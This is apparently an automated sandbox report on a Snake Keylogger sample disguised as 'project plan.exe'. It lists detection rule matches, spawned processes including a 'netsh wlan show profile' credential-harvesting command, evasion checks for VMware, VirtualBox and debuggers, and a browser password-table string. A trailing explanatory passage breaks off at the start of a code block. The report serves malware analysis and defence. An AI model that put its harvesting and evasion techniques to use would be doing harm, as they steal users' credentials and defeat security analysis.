                Source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, --.cs | Base64 encoded string: 'm6Xg2C2DGO3mlPcQp6s/LfmmtF6ui+8+Ju7mZMwu4ysjUr0OlymEIhyOhsWptaJK'
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, --.cs | Base64 encoded string: 'm6Xg2C2DGO3mlPcQp6s/LfmmtF6ui+8+Ju7mZMwu4ysjUr0OlymEIhyOhsWptaJK'
                Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@10/5@2/2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:120:WilError_03
                Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1536
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1568:120:WilError_03
                Source: C:\Windows\System32\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\7da7a6c0-778d-46da-af75-79ac18eb5ec4
                Source: project plan.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: project plan.exe | Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
                Source: C:\Users\user\Desktop\project plan.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002E1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002DC2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3222412002.0000000003CFB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002E2A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Users\user\Desktop\project plan.exe | File read: C:\Users\user\Desktop\project plan.exe
                Source: unknown | Process created: C:\Users\user\Desktop\project plan.exe "C:\Users\user\Desktop\project plan.exe"
                Source: C:\Users\user\Desktop\project plan.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\project plan.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                Source: C:\Users\user\Desktop\project plan.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                Source: C:\Users\user\Desktop\project plan.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1536 -s 1028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\SysWOW64\netsh.exe "netsh" wlan show profile
                Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\project plan.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                Source: C:\Users\user\Desktop\project plan.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\SysWOW64\netsh.exe "netsh" wlan show profile
                Source: C:\Users\user\Desktop\project plan.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\project plan.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\project plan.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\project plan.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\project plan.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\project plan.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\project plan.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\project plan.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\project plan.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\project plan.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\project plan.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\project plan.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\project plan.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\project plan.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\project plan.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mscoree.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wldp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: profapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasapi32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasman.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rtutils.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: secur32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: schannel.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mskeyprotect.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ntasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncryptsslp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
                Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
                Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
                Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshwfp.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cabinet.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2pnetsh.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2p.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rpcnsh.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: whhelper.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlancfg.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlanapi.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wshelper.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wevtapi.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: peerdistsh.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wcmapi.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rmclient.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mobilenetworking.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: slc.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: sppc.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ktmw32.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprmsg.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\project plan.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\project plan.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: project plan.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: project plan.exe Static file information: File size 2939959 > 1048576
                Source: project plan.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: project plan.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: mscorlib.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Drawing.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Drawing.pdbX source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: mscorlib.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Drawing.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Core.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.pdb; source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Drawing.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Core.pdbH source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Core.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848F1816B push ebx; retn 5F4Eh 0_2_00007FF848F1826A
                Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848F12E65 push eax; ret 0_2_00007FF848F12E1D
                Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848F12D80 push eax; ret 0_2_00007FF848F12E1D
                Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848F100BD pushad ; iretd 0_2_00007FF848F100C1
                Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848FF01AA push esp; retf 4810h 0_2_00007FF848FF0312
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06169157 push es; ret 3_2_061692B8
                Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\project plan.exe Memory allocated: 16754D70000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\project plan.exe Memory allocated: 1676E690000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: F60000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2C70000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2AB0000 memory reserve | memory write watch
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: Amcache.hve.7.dr Binary or memory string: VMware
                Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin
                Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: Amcache.hve.7.dr Binary or memory string: VMware20,1hbin@
                Source: Amcache.hve.7.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.7.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.7.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.7.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                Source: Amcache.hve.7.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
                Source: Amcache.hve.7.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.7.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: RegAsm.exe, 00000003.00000002.3220966436.0000000000FC1000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000009.00000003.2042868359.0000000000831000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dc9b102694a6ea<
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00F688C0 LdrInitializeThunk,LdrInitializeThunk,3_2_00F688C0
                Source: C:\Users\user\Desktop\project plan.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeMemory allocated: page read and write | page guardJump to behavior
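The two long VMware strings in the sample's memory are runs of length-prefixed strings, and the single odd characters between the paths are the length bytes. The following added example (not code from the report or from the sample) unpacks such runs. It assumes the layout of .NET's BinaryWriter.Write(string), a 7-bit encoded byte length followed by UTF-8 text, which is an inference from the fact that every separator byte equals the length of the path after it; the leading length byte of each run was not printable and so is missing from the report's strings, and the constructed blobs below restore it (0x06, 0x0b, 0x10).

```python
"""Unpack the length-prefixed string runs seen in the project plan.exe
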